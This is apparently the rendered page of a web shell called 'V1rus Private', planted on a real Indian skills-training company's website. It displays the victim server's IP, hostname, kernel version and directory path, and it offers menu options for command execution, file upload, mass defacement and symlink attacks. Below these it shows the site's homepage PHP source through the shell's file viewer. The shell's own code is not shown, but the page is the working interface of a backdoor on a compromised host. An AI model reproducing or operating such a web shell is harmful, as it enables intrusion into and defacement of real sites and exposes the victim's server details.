V1rus Private
User / IP
:
216.73.217.108
Host / Server
:
190.92.174.125 / aerosofthealthcare.com
System
:
Linux s3739.bom1.stableserver.net 4.18.0-513.24.1.lve.2.el8.x86_64 #1 SMP Fri May 24 12:42:50 UTC 2024 x86_64
Cmd
|
Upload
|
Mass Deface
|
Create
|
Sym
:
/
home
/
aerosoft
/
www
/
Viewing: index.php
<?php include 'header.php'; $sql = "SELECT * FROM products Orders LIMIT 1"; $res = $db->query($sql); $arr = array(); while ($row = $res->fetch_assoc()) { $arr[] = $row; } ?> <main> <div class="container-fluid"> <div class="row"> <div id="os_slider" class="carousel slide" data-ride="carousel"> <!-- Indicators --> <ul class="carousel-indicators"> <li data-target="#os_slider" data-slide-to="0" class="active"></li> <li data-target="#os_slider" data-slide-to="1"></li> <li data-target="#os_slider" data-slide-to="2"></li> <li data-target="#os_slider" data-slide-to="3"></li> </ul> <!-- The slideshow --> <div class="carousel-inner"> <div class="carousel-item active"> <img src="images/slider6.webp" alt="aerosofthealthcare"> </div> <div class="carousel-item"> <img src="images/slider2.jpg" alt="aerosofthealthcare"> </div> <div class="carousel-item"> <img src="images/slider1.jpg" alt="aerosofthealthcare"> </div> <div class="carousel-item"> <img src="images/slider3.jpg" alt="aerosofthealthcare"> </div> </div> <!-- Left and right controls --> <a class="carousel-control-prev" href="#os_slider" data-slide="prev"> <span class="carousel-control-prev-icon"></span> </a> <a class="carousel-control-next" href="#os_slider" data-slide="next"> <span class="carousel-control-next-icon"></span> </a> </div> </div> </div> <main> <section class="sec sec_1"> <div class="container"> <div class="row"> <div class="col-sm-7"> <div class="mb-4"> <h1 class="display-5">AHPL Profile & Expertise in Skill Development & Livelihood</h1> </div> <div class="lists_style mr-lg-4"> <ul> <li>Aerosoft Healthcare Pvt. Ltd., registered under the Companies Act, 1956, was incorporated on 2nd December 2013 in Ranchi, Jharkhand. AHPL is a prominent organization in the <b>Skill Development sector</b> and also functions as a <b>captive employer in the Construction Industry</b>, actively operating in both <b>West Bengal</b> and <b>Jharkhand</b>. </li> <li>Over the years, AHPL has made a significant impact by: Successfully <b>certifying 29,865 candidates</b> through various training programs.</li> <li>Facilitating wage employment for 16,356 candidates across multiple companies.</li> <li>Supporting <b>3,764 candidates</b> in achieving self-employment under <b>diverse government projects</b>.</li> <li>Through its commitment to empowerment and sustainable livelihood creation, AHPL continues to contribute meaningfully to workforce development and economic growth.</li> </ul> </div> </div> <div class="col-sm-5"> <div class="photo-img text-center"> <img class="img-fluid img-thumbnail" src="images/office_building.webp"> </div> </div> </div> </div> </section> <div class="container"> <div class="row"> <div class="col-md-12 title_txt"> <h3> About Us </h3> <div class="underline"></div> </div> </div> </div> <section class="section-1"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="about-txt"> <p class="m-0"> AHPL incorporate on 2nd December 2013. from beginning company work on employment generation programs self-funded or govt. Funded program. AHPL will be targeted towards four main objectives in Jharkhand For skills development. Now today till date more then 30,000+ candidates trained under schemes of govt .Funded programs By AHPL Quality outcomes:-To ensure quality outcomes in terms of both quality and quantity of placements. Improved placement rates along with salary levels of more than INR 8,000 per month is one of the key objectives of AHPL Training infrastructure creation with scale and speed: Given the ambitious target of the state to skill 20 lakh youth in next five years, it is imperative that aspirational and high quality standard training infrastructure is created with scale and speed By AHPL. <a href="company-profile.php"> Read more </a> </p> </div> </div> </div> </div> </section> <div class="container"> <div class="row"> <div class="col-md-12 title_txt"> <h3> Our Training Program </h3> <div class="underline"></div> </div> </div> </div> <section class="section-3 mb-5"> <div class="container"> <div class="row"> <div class="col-sm-7"> <div class="lists_style2 mr-lg-4"> <ul> <li>Training Partner: NIESBUD (Under MSME)</li> <li>Conducted short-term training programs in 2014–15 aimed at enhancing employability.</li> <li>Training Partner: NSDC (Under PMKVY)</li> <li>Successfully implemented skill development initiatives under: <ul><li>PMKVY 2015–16</li> <li>PMKVY 2016–20</li> <li>PMKVY 3.0 (COVID Crash Course)</li> <li>PMKVY 4.0 Special Projects</li> </ul> <li>Training Partner: SCPwD (Skill Council for Persons with Disabilities)</li> <li>Delivered specialized training to 935 PwD. candidates in Jharkhand under PMKVY 2016–20.</li> <li>Facilitated wage employment in areas such as: <ul> <li>Open shops, Food corners, Bakery outlets, Stitching centers, Garment shops</li> <li>Street vending and more</li> </ul> </li> </ul> </div> </div> <div class="col-sm-5"> <div class="owl-carousel owl-theme owl_training"> <?php $sql_projects = "SELECT * FROM products where cat_id='0' ORDER BY id DESC LIMIT 5"; $res_projects = $db->query($sql_projects); $arr_projects = array(); while ($row_projects = $res_projects->fetch_assoc()) { $arr_projects[] = $row_projects; } if (is_array($arr_projects) && count($arr_projects) > 0) { foreach ($arr_projects as $row_projects) { ?> <div class="item"> <div class="offer-card blog-box shadow"> <img class="w-100" src="./dashboard/prodcuts/<?php echo $row_projects['image']; ?>" alt="<?php echo $row_projects['product_title']; ?>" title="<?php echo $row_projects['product_title']; ?>"> <div class="card"> <div class="row d-flex align-items-center"> <div class="col-sm-12"> <div class="p-4"> <h4><a href="training-detail.php?id=<?php echo $row_projects['id']; ?>"> <?php echo $row_projects['product_title']; ?> </a></h4> <div class="box-txt"><?php echo $row_projects['description']; ?> </div> <div class="btn-link"> <a href="training-detail.php?id=<?php echo $row_projects['id']; ?>"> Read More <i class="fa fa-arrow-right-circle"></i></a> </div> </div> </div> </div> </div> </div> </div> <?php }} ?> </div> <div class="col-sm-12 text-center"> <a class="btn-sm btn btn-outline-success" href="training.php"> <i class="fa fa-eye"></i> View All </a> </div> </div> </div> </div> </section> <section class="sec"> <div class="container"> <div class="row"> <div class="col-md-12 title_txt"> <h3> Press & Media </h3> <div class="underline"></div> </div> </div> <div class="row mb-5"> <div class="col-sm-12"> <div class="owl-carousel owl-theme owl_press"> <div class="item"> <div class="card"> <div class="card-body"> <a target="_blank" href="images/press1.jpg"><img src="images/press1.jpg"></a> </div> </div> </div> <div class="item"> <div class="card"> <div class="card-body"> <a target="_blank" href="images/press2.jpg"><img src="images/press2.jpg"></a> </div> </div> </div> <div class="item"> <div class="card"> <div class="card-body"> <a target="_blank" href="images/press3.jpg"><img src="images/press3.jpg"></a> </div> </div> </div> <div class="item"> <div class="card"> <div class="card-body"> <a target="_blank" href="images/press4.jpg"><img src="images/press4.jpg"></a> </div> </div> </div> <div class="item"> <div class="card"> <div class="card-body"> <a target="_blank" href="images/press5.jpg"><img src="images/press5.jpg"></a> </div> </div> </div> <div class="item"> <div class="card"> <div class="card-body"> <a target="_blank" href="images/press6.jpg"><img src="images/press6.jpg"></a> </div> </div> </div> </div> </div> <!-- <div class="col-sm-12 text-center mt-4">--> <!-- <a class="btn btn-outline-success" href="photo-gallery.php"> <i class="fa fa-eye"></i> View All </a>--> <!--</div>--> </div> </div> </section> <div class="container"> <div class="row"> <div class="col-md-12 title_txt"> <h3> Gallery </h3> <div class="underline"></div> </div> </div> <div class="row mb-5"> <?php $sql_gallery = "SELECT * FROM `gallery` WHERE glry_cate = 'image' ORDER BY id DESC LIMIT 4"; $res_gallery = $db->query($sql_gallery); $arr_gallery = array(); while ($row_gallery = $res_gallery->fetch_assoc()) { $arr_gallery[] = $row_gallery; } if (is_array($arr_gallery) && count($arr_gallery) > 0) { foreach ($arr_gallery as $row_gallery) { ?> <div class="col-sm-3"> <div class="gallery-lightbox gallery_box"> <a href="dashboard/gallery/<?php echo $row_gallery['image']; ?>" class="lsb-preview" data-lsb-group="header"> <img src="dashboard/gallery/<?php echo $row_gallery['image']; ?>" alt="<?php echo $row_gallery['description'];?>" title="<?php echo $row_gallery['title'];?>"> </a> </div> </div> <?php }} ?> <div class="col-sm-12 text-center mt-4"> <a class="btn btn-outline-success" href="photo-gallery.php"> <i class="fa fa-eye"></i> View All </a> </div> </div> </div> <div class="container"> <div class="row"> <div class="col-md-12 title_txt"> <h3> Testimonial </h3> <div class="underline"></div> </div> </div> </div> <section class="section-3"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="featured_pro1"> <div class="owl-carousel owl-theme" id="ltl_art"> <?php $sql_projects = "SELECT * FROM products where cat_id='2' ORDER BY id DESC"; $res_projects = $db->query($sql_projects); $arr_projects = array(); while ($row_projects = $res_projects->fetch_assoc()) { $arr_projects[] = $row_projects; } if (is_array($arr_projects) && count($arr_projects) > 0) { foreach ($arr_projects as $row_projects) { ?> <div class="item"> <div class="item_box"> <span class="img-box"> <img src="./dashboard/prodcuts/<?php echo $row_projects['image']; ?>"> </span> <h4> <?php echo $row_projects['product_title']; ?> </h4> <div class="review_txt"> <?php echo $row_projects['description']; ?> </div> </div> </div> <?php }} ?> <div class="item"> <div class="item_box"> <span class="img-box"> <img src="images/training2.jpg"> </span> <h4> Suman Kumari </h4> <div class="review_txt"> <p> One of the best training center aerosofthealthcare Pvt. Ltd. </p> </div> </div> </div> <div class="item"> <div class="item_box"> <span class="img-box"> <img src="images/training2.jpg"> </span> <h4> Suman Kumari </h4> <div class="review_txt"> <p> One of the best training center aerosofthealthcare Pvt. Ltd. </p> </div> </div> </div> <div class="item"> <div class="item_box"> <span class="img-box"> <img src="images/training1.jpg"> </span> <h4> Suman Kumari </h4> <div class="review_txt"> <p> One of the best training center aerosofthealthcare Pvt. Ltd. </p> </div> </div> </div> <div class="item"> <div class="item_box"> <span class="img-box"> <img src="images/training2.jpg"> </span> <h4> Suman Kumari </h4> <div class="review_txt"> <p> One of the best training center aerosofthealthcare Pvt. Ltd. </p> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="section-3 mb-5 bg-white"> <div class="container"> <div class="row mt-5 mb-5"> <div class="col-sm-6"> <div class="feeds"> <div class="fb-page" data-href="https://www.facebook.com/aerosoftmmc" data-tabs="timeline" data-width="500px" data-height="" data-small-header="false" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true"><blockquote cite="https://www.facebook.com/aerosoftmmc" class="fb-xfbml-parse-ignore"><a href="https://www.facebook.com/aerosoftmmc">Aerosoft Healthcare - P Limited</a></blockquote></div> </div> </div> <div class="col-sm-6"> <div class="feeds"> <a class="twitter-timeline" href="https://x.com/aerosoftskill"></a> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> </div> </div> </div> </div> </section> </main> <?php include 'footer.php'; ?>
Coded With 💗 by
HanzOFC